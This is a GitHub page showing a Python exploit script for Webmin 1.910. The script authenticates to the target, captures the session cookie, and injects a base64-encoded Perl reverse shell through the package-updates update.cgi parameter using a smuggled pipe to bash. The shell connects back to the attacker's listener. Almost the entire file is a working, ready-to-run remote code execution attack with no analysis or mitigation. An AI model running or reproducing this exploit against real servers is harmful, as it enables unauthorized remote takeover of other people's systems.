forked from roughiz/Webmin-1.910-Exploit-Script
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathwebmin_exploit.py
More file actions
executable file
·75 lines (64 loc) · 4.16 KB
/
webmin_exploit.py
File metadata and controls
executable file
·75 lines (64 loc) · 4.16 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
#!/usr/bin/env python3
# -*- coding: utf8 -*-
import requests
import urllib3
urllib3.disable_warnings()
import argparse
import sys
import base64
from termcolor import colored
arg_parser = argparse.ArgumentParser(description='Webmin 1.910 - Remote Code Execution using, python script')
arg_parser.add_argument('--rhost', dest='rhost', help='Ip address of the webmin server', type=str, required=True)
arg_parser.add_argument("--rport", dest="rport", type=int, help="target webmin port, default 10000", default=10000)
arg_parser.add_argument('--lhost', dest='lhost', help='Local ip address to listen for the reverse shell', type=str, required=True)
arg_parser.add_argument("--lport", dest="lport", type=int, help="The Bind port for the reverse shell\n Default is 4444", default=4444)
arg_parser.add_argument('-u','--user', dest='user', help='The username to use for authentication\n By default is admin', default='admin', type=str)
arg_parser.add_argument('-p','--password', dest='password', help='The password to use for authentication', required=True, type=str)
arg_parser.add_argument('-t','--TARGETURI', dest='targeturi', help='Base path for Webmin application. By default set to "/"', default='/',type=str)
arg_parser.add_argument('-s','--SSL', dest='ssl', help='Negotiate SSL/TLS for outgoing connections. By default ssl is set to False', default='False',type=str)
args = arg_parser.parse_args()
# proxy set for test
proxies = {'http': 'http://127.0.0.1:8080','https': 'http://127.0.0.1:8080'}
# retrieve the Cookies sid:
print(colored('****************************** Webmin 1.910 Exploit By roughiz*******************************', "blue"))
print(colored('*********************************************************************************************', "blue"))
print(colored('*********************************************************************************************', "blue"))
print(colored('*********************************************************************************************', "blue"))
print(colored('****************************** Retrieve Cookies sid *****************************************', "blue"))
req={'page':'','user':args.user,'pass':args.password}
if args.ssl.lower() in ('yes', 'true', 't', 'y', '1'):
url="https://"+args.rhost+":"+str(args.rport)+args.targeturi
else:
url="http://"+args.rhost+":"+str(args.rport)+args.targeturi
resu=requests.post(url+"session_login.cgi",data=req, cookies={"testing":"1"}, verify=False, allow_redirects=False)
if b"This web server is running in SSL mode" in resu.content:
print(colored('********** [+] [Exploit][ERROR] Enable the ssl arg !!', "red"))
print((resu.content))
sys.exit(1)
if "sid" in resu.headers['Set-Cookie']:
sid= resu.headers['Set-Cookie'].replace('\n', '').split('=')[1].split(";")[0].strip()
print("\n")
print(colored('********** [+] [Exploit] The Cookie is '+sid, "green"))
else:
print(colored('********** [+] [Exploit][ERROR] The authentication to the webmin server failed', "red"))
sys.exit(1)
print("")
print(colored('********************************************************************************************', "blue"))
print(colored('****************************** Create payload and Exploit ***********************************', "blue"))
print("\n")
# Templateofthe payload
template="perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,\""+args.lhost+":"+str(args.lport)+"\");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'"
b64payload = base64.b64encode(bytes(f'{template}', 'utf-8'))
b64payload = b64payload.decode('utf-8')
payload=' | bash -c "{echo,'+b64payload+'}|{base64,-d}|{bash,-i}"'
## request the payload
req={'u':['acl/apt',payload]}
headers= {'Connection': 'close','referer': url+"package-updates/?xnavigation=1"}
try:
resu=requests.post(url+"package-updates/update.cgi",data=req, cookies={"sid":sid}, verify=False, allow_redirects=False, headers=headers, timeout=10)
except requests.Timeout:
pass
except requests.ConnectionError:
pass
print('\n')
print(colored('********** [+] [Exploit] Verify you nc listener on port '+str(args.lport)+' for the incomming reverse shell', "green"))